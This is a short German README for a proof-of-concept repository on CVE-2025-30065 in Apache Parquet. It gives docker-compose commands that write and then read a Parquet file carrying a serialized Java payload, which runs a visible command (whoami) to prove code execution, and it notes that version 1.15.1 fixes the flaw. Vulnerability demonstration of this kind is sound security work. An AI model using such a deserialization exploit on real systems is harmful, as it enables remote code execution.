
PoC
Dieses Projekt demonstriert einen sicheren Proof-of-Concept für CVE-2025-30065 unter Verwendung von Apache Parquet und Java-Deserialisierung.
Wenn eine Parquet-Datei mit einem serialisierten Java-Objekt gelesen wird, führt die Nutzlast einen sichtbaren Befehl aus, um die Codeausführung zu beweisen.
docker-compose run --rm maven-parquet mvn compile exec:java -Dexec.mainClass=ParquetPayloadWriter
docker-compose run --rm maven-parquet mvn compile exec:java -Dexec.mainClass=ParquetPayloadReader
Sie sollten so etwas sehen:
[👀 Payload-Ausgabe] {output of whoami}
Versuchen Sie, die Versionsnummer von der anfälligen <1.15.0 auf 1.15.1 in /app/pom.xml zu ändern. Es wird dann nicht mehr funktionieren.